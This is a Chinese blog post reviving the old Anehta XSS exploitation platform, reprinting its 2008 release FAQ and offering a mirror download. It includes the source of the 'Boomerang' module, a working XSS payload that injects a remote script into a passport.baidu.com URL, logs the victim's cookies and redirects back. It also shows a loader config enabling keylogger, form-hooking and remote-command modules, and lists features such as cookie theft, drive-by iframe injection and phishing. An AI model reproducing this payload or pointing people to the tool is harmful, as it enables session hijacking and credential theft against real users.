道哥当年的大作,昨天翻硬盘时,找到了这个老古董,百度一下,网上几乎已经没有下载,除了几个老站点外,相关介绍也是寥寥无几,毕竟过去快十一年了。
程序版本历经anehta0.5.5 、anehta0.5.6、anehta0.6.0,三个版本,后期停止更新。当初这款web攻击平台发布后很受欢迎,主要是因其整合了当时几乎所有XSS攻击技术为一体的平台。其中最引人注目的是其Boomerang技术,俗称回旋镖技术,可以跨域获取本地cookie,实现反射性XSS转化为持续型XSS。
原文Boomerang的工作原理:
我们知道,浏览器被XSS攻击后,攻击者可以用js或其他脚本控制浏览器的行为。这时候如果我们强制浏览器去访问站点B上一个存在XSS漏洞的页面,就可以继续用B站上的XSS_B控制用户的浏览器行为; 那么把整个过程结合起来,简单表示如下:
victim Browser —>site A,XSS_A —- redirect to —->Site B,XSS_B —– redirect somewhere —>…..
但是对于IE来说,想要通过XSS_B 获取 Site B的cookie是有一定的困难的,困难就在于,从site A发过来的request,是否带上了本地cookie。
我们知道,在IE中,iframe、img等标签都是拦截本地cookie的,于是这些都不能用。需要使用不拦截cookie的比如 window.open等方法,但是window.open会被IE拦截弹出窗口,所以我在boomerang 中使用了 表单提交,构造一个form,向site B提交,然后再从Site B导入一个XSS B,获取了cookie后,再通过表单提交,跳转回原来的Site A.
如果在Site B上,使用XSS_B再将页面重新定向回 Site A,那么对于用户来说,就是简单的闪了一下,非常具有欺骗性。
这个过程可以描述如下
////////////////////////////////////////////////////////////
var target_domain = “passport.baidu.com”;
var target=“http://passport.baidu.com/?getmypass&username=\”];document.write(‘<script src=http://www.secwiki.com/anehta/feed.js></script>’);//”;
// 前页面
var org_url = “http://www.secwiki.com/anehta/demo.html”;
var org_domain = “www.secwiki.com”;
// 如果是当前页面,则向目标提交
if ($d.domain == org_domain){
if (anehta.dom.checkCookie(“boomerang”) == false){
// 在cookie里做标记,只弹一次
anehta.dom.addCookie(“boomerang”, “x”);
setTimeout( function (){
//alert(target);
try {
anehta.net.postForm(target);
} catch (e){
//alert(e);
}
},
50);
}
}
// 如果是目标站点,则重定向回前页面
if ($d.domain == target_domain){
//clx模块太慢了
anehta.logger.logCookie(); //记录cookie
setTimeout( function (){
// 弹回原来的页面。
anehta.net.postForm(org_url);
},
50);
}由于在IE中,跳到了Site B后再跳回A,中间已经取到了B的cookie了,整个过程就像用回旋镖扔出去打了一下B一样,所以我把这个模块命名为回旋镖模块,英文是:Boomerang!
实现代码如下:
可以注意到,在Site B上停留的时间只有50毫秒,是非常短暂的,而我们想做的事情已经做完了。
所有需要的一切,只是在B站上有一个XSS,种类不限,也就是说,不管是反射型XSS,还是持久型XSS,都能很好的完成我们的工作。
在以往,反射型XSS可能是鸡肋,但是通过回旋镖模块,我们变废为宝了!
---------------------------------------------------------------------------------
对于XSS不了解的,可以移步XSS攻击的三种类型了解关于XSS攻击的具体知识。
---------------------------------------------------------------------------------
如何使用Anehta:
首先看架构,feed.js 是最基础的文件,一切anehta加载的源头都是这个文件。
以下是一个feed.js的例子,正常使用只需要修改其中这部分:
// anehta files url
var anehtaurl = “http://www.secwiki.com/anehta“;
var anehtaFeeds = [
// Library
{name: “BaseLib”, url: “/library/base.js”},
{name: “JqueryLib”, url: “/library/jquery.js”},
// Modules
//{name: “BoomerangMod”, url: “/module/boomerang.js”},
{name: “ClxMod”, url: “/module/clx.js”},
{name: “XsrfMod”, url: “/module/xsrf.js”},
//{name: “DdosMod”, url: “/module/ddos.js”},
{name: “HookMod”, url: “/module/hook.js”},
{name: “KeyloggerMod”, url: “/module/keylog.js”},
{name: “XCookieMod”, url: “/module/xcookie.js”},
//{name: “CookieDemoMod”, url: “/module/demo/cookieDemo.js”},
//{name: “CacheDemoMod”, url: “/module/demo/cacheDemo.js”},
{name: “RealtimeCmdMod”, url: “/module/realtimecmd.js”},
{name: “ScannerMod”, url: “/module/scanner.js”},
{name: “TestMod”, url: “/module/test.js”}
];将anehtaurl改为你自己存在anehta项目的路径即可使用。
下面的模块是可选的,去掉注释后能组合成各种不同的功能。
注意: 请不要在feed.js加载 /boomerang.js (回旋镖模块),因为这个模块是专门针对IE的,在后面的 xcookie.js 中会自动判断浏览器版本并加载这个文件。
同时如果加载 boomerang.js 的话,需要修改 boomerang.js 中的
var org_url = “http://www.secwiki.com/anehta/demo.html”; var org_domain = “www.secwiki.com”;
为被XSS的页面和被XSS的域名,否则回旋镖会跳不回来!
feed.js 会去加载 base.js ,这是最核心的文件,JS框架就是这个文件。然后会加载一系列的MOD。
打开文件夹后会看到很多文件,现在简单介绍下这些文件的作用:
feed.js 是前面说的加载js用的。
admin.php 是管理后台
logxss.php 是记录所有log的文件,文件会按照水印分类记录到slave目录下
ip.php 是反向查询地理位置的文件
cookie2proxy.php 是我用来向glype proxy 添加cookie的文件
realtimecmd.php 是实时控制客户端的文件
library 目录下放的是JS library,只有两个文件: base.js , jquery.js
module目录下是模块文件:
这些js都是独立的模块,xcookie是跨域获取cookie,clx是打水印的模块,我把它称作“楚留香模块”
boomerang就是回旋镖模块了
flash目录下目前放的是打水印用的flash
demo目录下还有些API的演示。
其他的模块都能从字面上理解其含义。
tools目录下放的是一些第三方工具,目前放了两个
一个是PHP的网页代理: glype
我修改后,可以自定义cookie了
另一个是发送邮件用的 phpMailer
说到发送邮件,在admin后台里,请大家不要随便点击 Mail&Del 按钮啊,log日志都发送到我的邮箱里了
-------------------------------------------------------------------------------------------------------
附上当初发布时的介绍, 道哥已经不再使用blog,所以原文是从其它站点复制下来的,其中包含的演示链接和下载链接已经失效,当年还为其做过镜像下载,算一下时间都过去11年了。。。。。
本次恢复镜像下载,旧版本就不放了,直接放最后一次更新版,也算是对过去的一个怀念。
下载地址:http://www.nukeblog.cn/anehta/anehta-v0.6.0fixed-withoutQQWry.zip (目前应该是全网不多的下载地址了)
-------------------------------------------------------------------------------------------------------
2008/10/23 12:54 作者:刺
两个礼拜了,从一开始的激动不已,到现在更加激动不已。
有很多想说,又不知从何说起。那么,还是采取FAQ的形式来向大家介绍吧!
Q: 为什么叫:Anehta ?
A: 因为“雅典娜”的名字是 :athena ,但是这个名字已经被sourceforge上的某人抢了,所以按照“刺氏命名法”,把“athena”反过来,本项目正式命名为: Anehta,中文发音:“阿内塔”
Q: Anehta 项目是做什么的?
A: 简单来说,你可以理解为 AttackAPI + BeEF。 但是Anehta 绝对没有这么简单,因为我实现了很多特有的机制,使得Anehta更加强大以及更加容易扩展。
Q: 没听过什么AttackAPI,还是不知道Anehta是做什么。
A: 更通俗来说,Anehta 就是一个跨站脚本攻击(XSS)的利用平台。
Q:Anehta是用什么语言开发的,对系统有什么要求?
A:由于在一开始就考虑到了通用性、跨平台性、跨浏览器、稳定性、易扩展性,所以Anehta在这方面做的是非常好的。anehta是基于javascript 和 PHP开发的。其中部分用到了 jQuery 框架,虽然anehta 可以独立于jQuery存在,但是考虑到引入jQuery 后,可以大大降低开发模块的成本,所以还是保留了。使用jQuery的另外一个好处就是跨浏览器,因为jQuery 本身是跨浏览器的,所以anehta也很容易做到这点.
使用PHP是因为PHP是当今使用最为广泛的脚本语言之一。(其实有个很不可告人的原因是因为大部分肉鸡都是PHP的吧,嘿嘿,anehta不需要任何perl、python、ruby等脚本支持)
Q:Anehta的架构是什么样的?
A:首先,我使用javascript 实现了一套JS框架,这套框架封装了很多函数和类,是专门用于攻击的一套JS框架。使用这套框架可以非常轻松的开发出威力强大的脚本。这套框架网站开发者也可以使用,可以获得很多强大的功能。
其次,基于这套框架,我开发了许多模块,比如本项目特有的“回旋镖模块”,可以跨域偷取cookie;再比如一个完美的JS键盘记录器等,还有很多功能,我会陆续补充好文档。
再次,anehta拥有非常清晰的结构,XSS后只需要加载一个feed.js,就会自动完成所有工作了。
最后,anehta不是纯客户端的,除了核心的JS攻击框架外,在服务端还利用PHP做了许多处理。
Q:Anehta具有什么特色和优点?
A:Anehta 结构清晰,功能是模块化,开发者可以单独为anehta开发各种各样的模块,以满足独特的需求。
模块之间具有低耦合性,互不影响。同时anehta的模块互相之间可以通信。
此外anetha还实现了很多独特、方便的技术。比如hook模块中,实现了可以hook任意js函数的方法。此外利用flash shared objects实现的水印技术也非常独特,即便用户删除了cookie,从IE切换到了Firefox或是Opera,也照样能够识别出是本人. 而回旋镖模块更是能够将反射型的XSS变成持久型的XSS,实时命令模块等都属于基本功能了。不久后我会补全anehta的文档,包括所有API的使用说明。
Anehta 的另一个特色就是会集成flash、java、css等多种hacking技术于一体,虽然目前还只实现了一小部分,但是我会慢慢把他们都做完。
此外,由于服务端的存在,所以Anehta 是一个平台(Platform),而并非一个框架(framework)。服务端设计还存在很大的开发潜力。
Q:为什么要做这样一个项目?
A:可以说是心血来潮,也可以说是游戏之作,但是Anehta确实倾注了我的大量心血。从一开始我就总结了很多需求,思考了很多设计上的东西,所以anehta拥有非常好的架构和可扩展性。我的目的是将anehta做成一个集web攻击大成者的平台,所以anehta会涉及到那么多乱七八糟的技术。
出于精简的目的,我舍弃了很多用处不大的功能,但是anehta还将扩展更多强大和实用的功能。在我看来,anehta的js框架部分已经比attackAPI要好了,功能部分更是远远超过了BeEF和XSS Shell!
Q:Anehta针对哪些用户?
A:本项目是为安全工程师进行渗透测试以及演示脚本漏洞的危害而设计,请勿用作非法用途!本项目遵循GPLv3条款,属于开源项目,任何人可以自由复制、使用或修改本代码,本人概不承担法律责任!
Q:Anehta实现了哪些功能?
A:以下是已经实现的功能列表:
* 获取客户端基本信息(浏览器版本/OS version/客户端IP/代理IP/Referer/Request URI);
* Ajax库支持
* 窃取客户端Cookie
* 跨域窃取Cookie(比如我在淘宝上窃取百度的cookie)
* 灵活的XSRF模块
* 客户端DDOS攻击(发起大量请求,CC)
* hook表单提交(Form Sniffer 功能)
* hook 任意javascript 函数;注入任意javascript函数
* 一个优秀的Javascript Keylogger;
* 支持数据加密传输(出于性能考虑,目前暂时使用base64)
* 注入iframe模块(可以实施挂马)
* 模块之间互相通信
* 独特的客户端水印,使得删除cookie、切换浏览器也能识别到用户
* logger虚拟守护进程(定时检查所有模块的输出,并记录到服务器)
窃取剪贴板的内容(仅仅支持IE)
* 客户端地理位置查询
* 在线的web代理,支持自定义cookie访问站点(第三方实现)
* 实时命令模块
* 扫描浏览器的历史记录
一个基于JS的端口扫描器
* 获取客户端软件信息(比如是否安装了QQ、迅雷等)
* 邮件通知模块
Q:Anehta未来会怎么发展?
A:我会持续开发和扩展Anehta,在不久的未来会完善英文文档并对外正式发布。目前计划里的蓝图如下:
Client-Side:
* GIFAR支持
ClickJacking/XSIO支持
XSS Worm Module
获取显示器分辨率
钓鱼模块(可以欺骗用户从而获取密码等)
获取客户端真实IP
* 更加强大的扫描模块
JS压缩、变形(让anehta更小巧)
Cross Site Sql Injection 模块(对注射的支持)
* 客户端代理模块(直接利用客户端访问网站,这在攻击内部系统时很有用)
* 检查IM或者网站的登录状态
* 更多的子窗口控制功能
* 调用activex的一些方法
* pipeline(管道功能,具体作用暂且保密)
* 验证码的支持
将大量功能集成到flash和java中
Heap Spray 、 Heap Fengshui 模块,帮助更方便写客户端exploit
升级和传播模块
支持加载第三方攻击库,比如attackAPI
新技术的支持(HTML5,AS3,CSS3等)
……
Server-Side:
* 通过IM自动通知Master
* 通过手机短信自动通知Master
客户端session保持以及session fixation支持
* 良好的多主机管理以及更加友好的界面
feed.js 生成器
* 数据库支持(Mysql 或 sqlite);
更加友好的log输出
Both Client and Server:
* 窃取客户端文件(Ajax Upload)
Anehta还有一些bug和不足,先不列到这里了,我会持续改进,此外由于我对UI和美化一窍不通,所以目前界面还很丑,将就着用吧!
哪位朋友有心也可以帮我写写UI。
最后,啰嗦了这么多,是不是等不及了呢?
那么,要看演示的,可以到这里下载录像:
http://www.secwiki.com/anehta/demo/anehtaDEMO.zip
也可以在线观看,不过文件比较大,有20多M
http://www.secwiki.com/anehta/demo/anehta.html
想体验一下? 到这里访问demo页面:
http://www.secwiki.com/anehta/demo.html DEMO页面是一个被XSS的页面
粗陋的后台是在:
http://www.secwiki.com/anehta/admin.php 在这里可以看到被XSS后的结果。
请参考我制作的录像
FF的用户请关闭noscript扩展,拦截了就没得玩了撒
项目首页:
http://anehta.googlecode.com
源代码获取:
http://code.google.com/p/anehta/source/checkout
打包下载:
http://anehta.googlecode.com/files/anehta-v0.5.5.zip
-EOF-
